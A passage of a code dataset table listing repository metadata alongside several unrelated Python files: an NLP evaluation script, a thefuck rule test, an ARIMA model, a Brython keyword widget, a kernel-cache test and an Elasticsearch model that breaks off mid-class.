hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42a9d7f0de1fb5aee832bc5e97c48ecbdecd3930
| 10,460
|
py
|
Python
|
scripts/pos_eval.py
|
ProKil/sparse-text-prototype
|
e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd
|
[
"MIT"
] | 19
|
2020-11-05T12:17:45.000Z
|
2021-11-17T08:43:50.000Z
|
scripts/pos_eval.py
|
ProKil/sparse-text-prototype
|
e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd
|
[
"MIT"
] | 1
|
2021-07-08T13:30:15.000Z
|
2021-07-08T13:30:15.000Z
|
scripts/pos_eval.py
|
ProKil/sparse-text-prototype
|
e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd
|
[
"MIT"
] | 2
|
2020-12-20T13:19:14.000Z
|
2021-06-25T20:18:00.000Z
|
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
| 33.41853
| 122
| 0.603537
| 365
| 0.034895
| 0
| 0
| 0
| 0
| 0
| 0
| 1,949
| 0.186329
|
42aa82728f6722cbbdd0c68a0e10c8dd5f0958ee
| 582
|
py
|
Python
|
tests/rules/test_git_stash_pop.py
|
RogueScholar/thefuck-termux
|
cc33d5fa0077b2b2323b8a62f3478ff8efef3fba
|
[
"MIT"
] | null | null | null |
tests/rules/test_git_stash_pop.py
|
RogueScholar/thefuck-termux
|
cc33d5fa0077b2b2323b8a62f3478ff8efef3fba
|
[
"MIT"
] | null | null | null |
tests/rules/test_git_stash_pop.py
|
RogueScholar/thefuck-termux
|
cc33d5fa0077b2b2323b8a62f3478ff8efef3fba
|
[
"MIT"
] | null | null | null |
import pytest
from thefuck.rules.git_stash_pop import get_new_command
from thefuck.rules.git_stash_pop import match
from thefuck.types import Command
@pytest.fixture
def output():
return """error: Your local changes to the following files would be overwritten by merge:"""
def test_match(output):
assert match(Command("git stash pop", output))
assert not match(Command("git stash", ""))
def test_get_new_command(output):
assert (get_new_command(
Command("git stash pop",
output)) == "git add --update && git stash pop && git reset .")
| 26.454545
| 96
| 0.707904
| 0
| 0
| 0
| 0
| 126
| 0.216495
| 0
| 0
| 178
| 0.305842
|
42ab556174e9603454893f6f485c837afcd3bad8
| 3,642
|
py
|
Python
|
src/arima_model.py
|
SaharCarmel/ARIMA
|
c54e8554f1c4a95c25687bdf35b4296ed6bd78d6
|
[
"MIT"
] | null | null | null |
src/arima_model.py
|
SaharCarmel/ARIMA
|
c54e8554f1c4a95c25687bdf35b4296ed6bd78d6
|
[
"MIT"
] | null | null | null |
src/arima_model.py
|
SaharCarmel/ARIMA
|
c54e8554f1c4a95c25687bdf35b4296ed6bd78d6
|
[
"MIT"
] | null | null | null |
""" The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
"""ARIMA [summary]
"""
def __init__(self,
p: int = 0,
d: int = 0,
q: int = 0) -> None:
"""__init__ General ARIMA model constructor.
Args:
p (int): The number of lag observations included in the model,
also called the lag order.
d (int): The number of times that the raw observations are
differenced, also called the degree of differencing.
q (int): The size of the moving average window,
also called the order of moving average.
"""
super(ARIMA, self).__init__()
self.p = p
self.pWeights = torch.rand(p)
self.pWeights.requires_grad = True
self.q = q
self.qWeights = torch.rand(q)
self.qWeights.requires_grad = True
self.d = d
self.dWeights = torch.rand(d)
self.dWeights.requires_grad = True
self.drift = torch.rand(1)
pass
def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
"""forward the function that defines the ARIMA(0,1,1) model.
It was written specifically for the case of ARIMA(0,1,1).
Args:
x (torch.Tensor): The input data. All the past observations
err (torch.Tensor): The error term. A normal distribution vector.
Returns:
torch.Tensor: The output of the model. The current prediction.
"""
zData = torch.diff(x)
zPred = self.dWeights*zData[-1] + \
self.qWeights*err[-2] + err[-1] + self.drift
aPred = zPred + x[-1]
return aPred
def generateSample(self, length: int) -> torch.Tensor:
"""generateSample An helper function to generate a sample of data.
Args:
length (int): The length of the sample.
Returns:
torch.Tensor: The generated sample.
"""
sample = torch.zeros(length)
noise = torch.tensor(np.random.normal(
loc=0, scale=1, size=length), dtype=torch.float32)
sample[0] = noise[0]
with torch.no_grad():
for i in range(length-2):
sample[i+2] = self.forward(sample[:i+2], noise[:i+2])
pass
return sample
def fit(self,
trainData: torch.Tensor,
epochs: int,
learningRate: float) -> None:
"""fit A function to fit the model. It is a wrapper of the
Args:
trainData (torch.Tensor): The training data.
epochs (int): The number of epochs.
learningRate (float): The learning rate.
"""
dataLength = len(trainData)
errors = torch.tensor(np.random.normal(
loc=0, scale=1, size=dataLength), dtype=torch.float32)
for epoch in range(epochs):
prediction = torch.zeros(dataLength)
for i in range(dataLength-2):
prediction[i +
2] = self.forward(trainData[0:i+2], errors[0:i+2])
pass
loss = torch.mean(torch.pow(trainData - prediction, 2))
print(f'Epoch {epoch} Loss {loss}')
loss.backward()
self.dWeights.data = self.dWeights.data - \
learningRate * self.dWeights.grad.data
self.dWeights.grad.data.zero_()
self.qWeights.data = self.qWeights.data - \
learningRate * self.qWeights.grad.data
self.qWeights.grad.data.zero_()
pass
| 34.358491
| 77
| 0.549149
| 3,581
| 0.983251
| 0
| 0
| 0
| 0
| 0
| 0
| 1,386
| 0.38056
|
42ab6fa034b5730a8c76b4b76e6056f1b558984c
| 687
|
py
|
Python
|
problems/slidingwindow/Solution1100.py
|
akalu/cs-problems-python
|
9b1bd8e3932be62135a38a77f955ded9a766b654
|
[
"MIT"
] | null | null | null |
problems/slidingwindow/Solution1100.py
|
akalu/cs-problems-python
|
9b1bd8e3932be62135a38a77f955ded9a766b654
|
[
"MIT"
] | null | null | null |
problems/slidingwindow/Solution1100.py
|
akalu/cs-problems-python
|
9b1bd8e3932be62135a38a77f955ded9a766b654
|
[
"MIT"
] | null | null | null |
"""
Sliding window
Given a string S, return the number of substrings of length K with no
repeated characters.
Example 1:
Input: S = "havefunonleetcode", K = 5 Output: 6 Explanation: There are 6
substrings they are : 'havef','avefu','vefun','efuno','etcod','tcode'.
counter havefunonleetcode
IDEA:
1) for each letter in the string setup a counter and
2) update unique counter each time when counter[let] hits 0, 1 or 2 (magic numbers)
aaabac
|||
123
0) a:3 unique=0
1) a:2 b:1 unique=1
2) a:2 b:1 unique=1
3) a:2 b:1 c:1 unique=1+2=3
"""
class Solution1100:
pass
| 18.078947
| 86
| 0.58952
| 28
| 0.040757
| 0
| 0
| 0
| 0
| 0
| 0
| 656
| 0.954876
|
42ab8cf968e58717ef4f86c899c0440ef99114b5
| 26
|
py
|
Python
|
the_file_propagator/__init__.py
|
joeflack4/the-file-propagator
|
c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713
|
[
"MIT"
] | null | null | null |
the_file_propagator/__init__.py
|
joeflack4/the-file-propagator
|
c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713
|
[
"MIT"
] | null | null | null |
the_file_propagator/__init__.py
|
joeflack4/the-file-propagator
|
c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713
|
[
"MIT"
] | null | null | null |
"""The File Propagator"""
| 13
| 25
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.961538
|
42ab9f264f4ecd8a53e0ce06b3bb77538b433100
| 4,681
|
py
|
Python
|
src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py
|
WebArchivCZ/WA-KAT
|
719f7607222f5a4d917c535b2da6371184222101
|
[
"MIT"
] | 3
|
2017-03-23T12:59:21.000Z
|
2017-11-22T08:23:14.000Z
|
src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py
|
WebArchivCZ/WA-KAT
|
719f7607222f5a4d917c535b2da6371184222101
|
[
"MIT"
] | 89
|
2015-06-28T22:10:28.000Z
|
2017-01-30T16:06:05.000Z
|
src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py
|
WebarchivCZ/WA-KAT
|
719f7607222f5a4d917c535b2da6371184222101
|
[
"MIT"
] | 1
|
2015-12-17T02:56:59.000Z
|
2015-12-17T02:56:59.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: brython (http://brython.info) (like python3)
#
# Imports =====================================================================
from os.path import join
from browser import window
from browser import document
# virtual filesystem / modules provided by REST API
from virtual_fs import settings
# Functions & classes =========================================================
class KeywordListHandler(object):
"""
This class is used to control the GUI for the list of keywords.
It allows user to add new keyword, remove present keyword and get a list
of defined keywords.
"""
def __init__(self, el_id, whole_id=None):
if whole_id is None:
whole_id = "whole_" + el_id
self.el = document[el_id]
self.whole_el = document[whole_id]
self.all_lists_el = document["whole_keyword_list"]
self.keywords = []
self._remover = """
<span class='kw_remover'
title='Odstranit klíčové slovo.'
id='kw_remover_id_%d'>
✖
</span>
"""
self._render()
def _render(self):
"""
Render the HTML code for all the :attr:`keywords` stored in this class.
This method is called after each change in :attr:`keywords`.
"""
# hide the list in case that there is no `keyword` to be displayed
if self.keywords:
self.whole_el.style.display = "block"
self.all_lists_el.style.display = "block"
else:
self.whole_el.style.display = "none"
if "<li>" not in self.all_lists_el.html:
self.all_lists_el.style.display = "none"
# construct the HTML code for each keyword
html_lines = (
"<li class='kw_enum'>{0} {1}</li>\n".format(
keyword,
(self._remover % cnt)
)
for cnt, keyword in enumerate(self.keywords)
)
# put the keywords into the HTML code of the page
self.el.innerHTML = "<ol>\n%s\n</ol>\n" % "\n".join(html_lines)
# this function is used to bind the ✖ to function for removing the
# keyword
def keyword_remover(keyword):
def remover(ev):
self.remove_keyword(keyword)
return remover
# go thru all the keywords and bind them to keyword_remover()
for cnt, keyword in enumerate(self.keywords):
uid = "kw_remover_id_%d" % cnt
el = document[uid]
el.bind("click", keyword_remover(keyword))
def add_keyword(self, keyword):
"""
Add `keyword` to :attr:`keywords`.
Args:
keyword (str): New keyword.
"""
self.keywords.append(keyword)
self._render()
def remove_keyword(self, keyword):
"""
Remove `keyword` from :attr:`keywords`.
Args:
keyword (str): Keyword which should be removed.
"""
self.keywords.remove(keyword)
self._render()
def reset(self):
"""
Reset the widget to the default state.
"""
self.keywords = []
self._render()
UserKeywordHandler = KeywordListHandler("user_keyword_list")
AlephKeywordHandler = KeywordListHandler("aleph_keyword_list")
AanalysisKeywordHandler = KeywordListHandler("analysis_keyword_list")
class KeywordAdder(object):
"""
This class is here to controll typeahead input bar with keyword suggestion.
Keywords selected from suggestions are then mapped to
:class:`KeywordListHandler`.
"""
intput_el = document["keyword_adder"]
@classmethod
def on_select_callback(cls, selected_item):
"""
This method defines the action taken when user selects the keyword from
suggestion engine.
Args:
selected_item (str): Keyword selected by the user.
Returns:
str: Value on which the <input> element will be set.
"""
UserKeywordHandler.add_keyword(selected_item)
return ""
@classmethod
def set_kw_typeahead_input(cls):
"""
Map the typeahead input to remote dataset.
"""
# get reference to parent element
parent_id = cls.intput_el.parent.id
if "typeahead" not in parent_id.lower():
parent_id = cls.intput_el.parent.parent.id
window.make_keyword_typeahead_tag(
"#" + parent_id,
join(settings.API_PATH, "kw_list.json"),
cls.on_select_callback,
)
KeywordAdder.set_kw_typeahead_input()
| 29.25625
| 79
| 0.580432
| 4,001
| 0.853456
| 0
| 0
| 911
| 0.194326
| 0
| 0
| 2,281
| 0.486561
|
42abdb34b5121a34132a5ff61f5b37cf1ca828bc
| 53
|
py
|
Python
|
scripts/rnn/gru/__init__.py
|
bfeng/CryptoGRU
|
65f6fe9eba981fea65fc665ff16938bf3a593001
|
[
"MIT"
] | 1
|
2022-01-12T03:18:55.000Z
|
2022-01-12T03:18:55.000Z
|
scripts/rnn/gru/__init__.py
|
bfeng/CryptoGRU
|
65f6fe9eba981fea65fc665ff16938bf3a593001
|
[
"MIT"
] | null | null | null |
scripts/rnn/gru/__init__.py
|
bfeng/CryptoGRU
|
65f6fe9eba981fea65fc665ff16938bf3a593001
|
[
"MIT"
] | null | null | null |
from .grucell import MyGRUCell
from .gru import MyGRU
| 26.5
| 30
| 0.830189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
42b002236c965251bc510639be4dce4dd1300339
| 2,946
|
py
|
Python
|
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2.7
import os
import KernelCollection
# Check that weak binds can be missing, so long as we check for the magic symbol
def check(kernel_cache):
kernel_cache.buildKernelCollection("arm64", "/kext-missing-weak-bind/main.kc", "/kext-missing-weak-bind/main.kernel", "/kext-missing-weak-bind/extensions", ["com.apple.foo", "com.apple.bar"], [])
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-layout", "-arch", "arm64"])
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__DATA_CONST"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x18000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
# Symbols
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-symbols", "-arch", "arm64"])
# kernel
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["name"] == "_gOSKextUnresolved"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["vmAddr"] == "0x20000"
# Check the fixups
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-fixups", "-arch", "arm64"])
assert len(kernel_cache.dictionary()["fixups"]) == 4
assert kernel_cache.dictionary()["fixups"]["0x18000"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18008"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18010"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18018"] == "kc(0) + 0x20000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][1]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
assert kernel_cache.dictionary()["dylibs"][2]["fixups"] == "none"
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie -Wl,-sectcreate,__LINKINFO,__symbolsets,SymbolSets.plist -Wl,-segprot,__LINKINFO,r--,r-- main.c -o main.kernel
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info bar.c -o extensions/bar.kext/bar -Wl,-fixup_chains
# [~]> rm -r extensions/*.kext/*.ld
| 62.680851
| 316
| 0.681942
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,686
| 0.572301
|
42b0f3205382f72fca408d985411165330e27a01
| 7,453
|
py
|
Python
|
datahub/search/investment/models.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
datahub/search/investment/models.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | 16
|
2020-04-01T15:25:35.000Z
|
2020-04-14T14:07:30.000Z
|
datahub/search/investment/models.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
from elasticsearch_dsl import Boolean, Date, Double, Integer, Keyword, Long, Object, Text
from datahub.search import dict_utils
from datahub.search import fields
from datahub.search.models import BaseESModel
DOC_TYPE = 'investment_project'
def _related_investment_project_field():
"""Field for a related investment project."""
return Object(properties={
'id': Keyword(),
'name': fields.NormalizedKeyword(),
'project_code': fields.NormalizedKeyword(),
})
class InvestmentProject(BaseESModel):
"""Elasticsearch representation of InvestmentProject."""
id = Keyword()
actual_land_date = Date()
actual_uk_regions = fields.id_name_field()
address_1 = Text()
address_2 = Text()
address_town = fields.NormalizedKeyword()
address_postcode = Text()
approved_commitment_to_invest = Boolean()
approved_fdi = Boolean()
approved_good_value = Boolean()
approved_high_value = Boolean()
approved_landed = Boolean()
approved_non_fdi = Boolean()
allow_blank_estimated_land_date = Boolean(index=False)
allow_blank_possible_uk_regions = Boolean(index=False)
anonymous_description = fields.EnglishText()
archived = Boolean()
archived_by = fields.contact_or_adviser_field()
archived_on = Date()
archived_reason = Text()
associated_non_fdi_r_and_d_project = _related_investment_project_field()
average_salary = fields.id_name_field()
business_activities = fields.id_name_field()
client_cannot_provide_foreign_investment = Boolean()
client_cannot_provide_total_investment = Boolean()
client_contacts = fields.contact_or_adviser_field()
client_relationship_manager = fields.contact_or_adviser_field(include_dit_team=True)
client_requirements = Text(index=False)
comments = fields.EnglishText()
country_investment_originates_from = fields.id_name_field()
country_lost_to = Object(
properties={
'id': Keyword(index=False),
'name': Text(index=False),
},
)
created_on = Date()
created_by = fields.contact_or_adviser_field(include_dit_team=True)
date_abandoned = Date()
date_lost = Date()
delivery_partners = fields.id_name_field()
description = fields.EnglishText()
estimated_land_date = Date()
export_revenue = Boolean()
fdi_type = fields.id_name_field()
fdi_value = fields.id_name_field()
foreign_equity_investment = Double()
government_assistance = Boolean()
intermediate_company = fields.id_name_field()
investor_company = fields.id_name_partial_field()
investor_company_country = fields.id_name_field()
investment_type = fields.id_name_field()
investor_type = fields.id_name_field()
level_of_involvement = fields.id_name_field()
likelihood_to_land = fields.id_name_field()
project_assurance_adviser = fields.contact_or_adviser_field(include_dit_team=True)
project_manager = fields.contact_or_adviser_field(include_dit_team=True)
name = Text(
fields={
'keyword': fields.NormalizedKeyword(),
'trigram': fields.TrigramText(),
},
)
new_tech_to_uk = Boolean()
non_fdi_r_and_d_budget = Boolean()
number_new_jobs = Integer()
number_safeguarded_jobs = Long()
modified_on = Date()
project_arrived_in_triage_on = Date()
project_code = fields.NormalizedKeyword(
fields={
'trigram': fields.TrigramText(),
},
)
proposal_deadline = Date()
other_business_activity = Text(index=False)
quotable_as_public_case_study = Boolean()
r_and_d_budget = Boolean()
reason_abandoned = Text(index=False)
reason_delayed = Text(index=False)
reason_lost = Text(index=False)
referral_source_activity = fields.id_name_field()
referral_source_activity_event = fields.NormalizedKeyword()
referral_source_activity_marketing = fields.id_name_field()
referral_source_activity_website = fields.id_name_field()
referral_source_adviser = Object(
properties={
'id': Keyword(index=False),
'first_name': Text(index=False),
'last_name': Text(index=False),
'name': Text(index=False),
},
)
sector = fields.sector_field()
